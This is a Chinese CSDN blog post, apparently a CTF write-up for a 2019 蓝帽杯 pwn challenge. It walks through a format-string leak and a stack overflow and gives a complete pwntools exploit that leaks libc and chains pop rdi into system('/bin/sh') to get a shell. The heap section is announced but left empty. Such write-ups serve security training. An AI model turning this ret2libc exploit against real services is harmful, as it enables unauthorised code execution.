2019蓝帽杯_多漏洞组合-堆栈格式化

最新推荐文章于 2023-09-20 20:59:58 发布
最新推荐文章于 2023-09-20 20:59:58 发布
阅读量374 收藏
点赞数
分类专栏: 赛事复现
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_42037374/article/details/104050178
版权

文件安全机制

    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x400000)

file信息

./pwn: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/l, for GNU/Linux 2.6.32, BuildID[sha1]=392d9fb8fb2f5ba26bb829789ac6ec1d928c4ff0, not stripped

漏洞点1

int getname1()
{
  int result; // eax
  char s; // [rsp+0h] [rbp-20h]
  char format; // [rsp+10h] [rbp-10h]

  puts("input your name");
  readi(&format, 24LL);
  printf(&format);
  memset(&s, 0, 0x10uLL);
  puts("Let's start a game, can you guess the keyword?");
  read(0, &s, 0x90uLL);
  if ( !strcmp(&s, keyword) )
    result = puts("good boy\n");
  else
    result = puts("fail");
  return result;
}
漏洞点1的利用方法是:利用格式化和栈溢出
知识点1
libc_start_main = eval('0x'+ p.recv(12)) - libc.symbols['__libc_start_main'] -0xf0

对照libcsearch使用,作用类似
这是知道libc_base的情况下
libc_base+libc.search("/bin/sh").next()
libc_base+libc.symbols['system']
漏洞点二(堆)

EXP1

from pwn import*
context.log_level = 'debug'

p = process("./pwn")
libc = ELF("./libc.so.6")
p.recvuntil("choice:\n")
p.sendline("1")
p.recvuntil("input your name\n")
p.sendline("%15$p")  #8+7
p.recvuntil("0x")

libc_start_main = eval('0x'+ p.recv(12)) 
libc_base = libc_start_main - libc.symbols['__libc_start_main'] -0xf0
print ("[+]-----> libc_start_main = ") +hex(libc_base)

p.recvuntil("can you guess the keyword?")
pop_rdi_addr = 0x401213
#======1=====
payload = "a"*40 + p64(pop_rdi_addr) 
payload += p64(libc_base+libc.search("/bin/sh").next()) + p64(libc_base+libc.symbols['system'])
#======2=====
#猜的没错,这个地方的利用方法很多 2 3 4。。。。
p.sendline(payload)
p.sendline("ls")

p.interactive()
Jc^
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
oracle11.2.0.4_linux-x86-64位全套安装包
08-01
内附百度网盘连接 包含oracle11.2.0.4_x86-64位linux版本全套安装包: p13390677_112040_Linux-x86-64_1of7.zip p13390677_112040_Linux-x86-64_2of7.zip ...7:deinstall,Oracle自带的界面化卸载工具;
第五届蓝帽杯_2021_chall
05-13
第五届蓝帽杯_2021_chall,沙盒机制的pwn题。
2022.7.9 第六届蓝帽杯复现
Pai_Space
07-11 783
2022.7.9 第六届蓝帽杯复现
jfinal 将exception等异常信息保存到数据库,格式化堆栈异常信息
kevon_sun的专栏
05-02 1356
首先需要给jfinal创建拦截器public class Exceptionnterceptor implements Interceptor { @Override public void intercept(Invocation ai) { Controller controller = (Controller)ai.getController(); HttpServletReq...
第六届“蓝帽杯”全国大学生网络安全技能大赛-初赛Writeup
个人博客:https://www.mrzry.top
07-09 3728
第六届“蓝帽杯”全国大学生网络安全技能大赛-初赛Writeup
蓝帽杯总结
plant1234的博客
05-23 400
会做题目: WEB: Ball_sigin: 签到题,用手机打开,填补左上角空缺的单词,完游戏即得到flag MISC: 冬奥会_is_coming: 题目为png图片: 利用binwalk分离得到一个压缩包: 解压包提示要解码,而且还需要8位数密码 用编译器打开发现emoji码: 解码发现是乱码,可能需要密钥。 想到解药是要8位密码,于是利用mp3stego工具分离得到十六进制码转换一下得到emoji码: 利用网站https://lingojam.com/WingDing解emoji码得到: 根据提示去
[蓝帽杯 2021]One Pointer PHP【溢出+FPM】
D.MIND 的博客
05-20 820
文章目录整型溢出`chdir()`、 `ini_set()`绕过open_basedir读取nginx配置文件方法一方法二: 整型溢出 利用64位系统的整型最大值溢出,这里令count=9223372036854775806,当再加2时就会提示溢出警告,从而绕过。 <?php class User{ public $count=9223372036854775806; } echo urlencode(serialize(new User())); ?> //O%3A4%3A%22User%
【电子取证】网站取证(第六届”蓝帽杯“全国大学生网络安全技能大赛)
07-12
在第六届“蓝帽杯”全国大学生网络安全技能大赛中,参赛者可能需要掌握这项技术来解决实际问题。电子取证,也被称为数字取证,是指在法律允许的范围内,对电子设备中的数据进行收集、分析、验证,以获取与法律纠纷或...
蓝帽杯one_Pointer_php writeup
05-10
蓝帽杯one_Pointer_php writeup
Automatic-Helmet-Detection-master.zip_helmet-detection_安全帽 检测_安全
07-14
使用机器学习方法进行安全帽的检测,在一定程度上保障了工人的安全。
2020全国工业互联网安全技术技能大赛题目
10-28
含有misc,re,crypto,pwn及题目说明
2022蓝帽杯初赛
cppuHsir的博客
07-22 438
2022蓝帽杯初赛题目
2022蓝帽杯wp
hez__的博客
07-10 601
蓝帽杯 2022 wp
2022 第六届蓝帽杯初赛 WP By 知行网安
xczzhf的博客
07-11 1349
第六届蓝帽杯wp
第五届蓝帽杯初赛:冬奥会_is_coming
qq_46230755的博客
04-30 8430
运气好,这次蓝帽杯比赛,做出了这题,就能进半决赛了,这题实在是很套娃,我都怀疑是不是我套宝出的题目了。 题目是究极套娃题打开文件存在冰墩墩图片。 把图片放入010edito里面,发现有编码,一个rar全部截出 得到新的rar里面有一个MP3文件,同时rar有提示八位数字 将MP3的文件进行MP3stego解码,然后密码是20220204 (提示的八位数字)冬奥会的开赛时间 得到一堆的编码,是hex。 空格去掉 \x转为hex编码 然后这是wingding编码,转换一下 得到一串英文 然后去这
2022蓝帽杯初赛wp
weixin_52829570的博客
07-10 802
第六届”蓝帽杯“全国大学生网络安全技能大赛初赛
2023第七届蓝帽杯半决赛 复现(取证及一道Misc)
最新发布
qq_73722777的博客
09-20 591
这个应该就是我们要找的key,但是在AES加密后还进行了base64编码,因此我们也需要将key进行base编码。(比赛的时候想的是全部重新排序后重新变成应该39x39的方阵,结果是每一列重新排序。答案:com.example.myapplication.MainActivity。(这里的aes配置基本都用的默认配置,其实也没搞懂aes加密的机制)由于AES密钥最长为16位,因此我们只用前16位就能解开加密。打开文件,全部框选后发现有数据,把所有字体修改为黑色。应该是206个,题目写的也不清晰。
[蓝帽杯2020第四届 线上赛]Soitgoes
qq_43801002的博客
08-08 1003
题目 php反序列化,pop构造,常规题 过程 1.index.php页面右键查看源码,感觉要用php伪协议去读try.php 2.?file=php://filter/read=convert.base64-encode/resource=这次没有过滤,直接读到 index.php try.php <?php class Seri{ public $alize; public function __construct($alize) { $this->ali
蓝帽杯“比赛后的感想
qq_46110224的博客
08-08 576
蓝帽杯心得前 言记 录心 得 前 言 第一次参加这么正式的比赛,比赛过程中就感觉被完虐的样子,比赛后更是内心遭到十万伏特高压电的打击。 记 录 得到通知以前,内心是感觉新鲜的,然后就开始疯狂刷题、学习,为这次的蓝帽杯进行准备,比赛前夕,感觉信心十足。 十点,正式比赛开始,先来了五道签到题,首先看中了杂项,但是发现有点绕,最终还是用小技巧做了做出来。但是转折点来了,做过这一道题后,剩下的题陆续开始着手,但是明显感觉到了出题者的“恶意”。剩下的每道题都是有思路、但是动手废的情况,甚至于到最后一步,就是出不来,内
上述表述和我下载的官方代码不一样,以下是我截取的部分源代码,请重新整理if name == 'main': parser = argparse.ArgumentParser() parser.add_argument('--weights', nargs='+', type=str, default='yolov5s.pt', help='model.pt path(s)') parser.add_argument('--source', type=str, default='data/images', help='source') # file/folder, 0 for webcam parser.add_argument('--img-size', type=int, default=640, help='inference size (pixels)') parser.add_argument('--conf-thres', type=float, default=0.25, help='object confidence threshold') parser.add_argument('--iou-thres', type=float, default=0.45, help='IOU threshold for NMS') parser.add_argument('--device', default='', help='cuda device, i.e. 0 or 0,1,2,3 or cpu') parser.add_argument('--view-img', action='store_true', help='display results') parser.add_argument('--save-txt', action='store_true', help='save results to *.txt') parser.add_argument('--save-conf', action='store_true', help='save confidences in --save-txt labels')
07-25
# 初始化时间记录和报警规避相关变量 last_alarm_time = time.time() # 上次报警时间 alarm_interval = 10 # 报警时间间隔(秒) # 打开摄像头 cap = cv2.VideoCapture(args.source) while cap.isOpened(): ret, ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值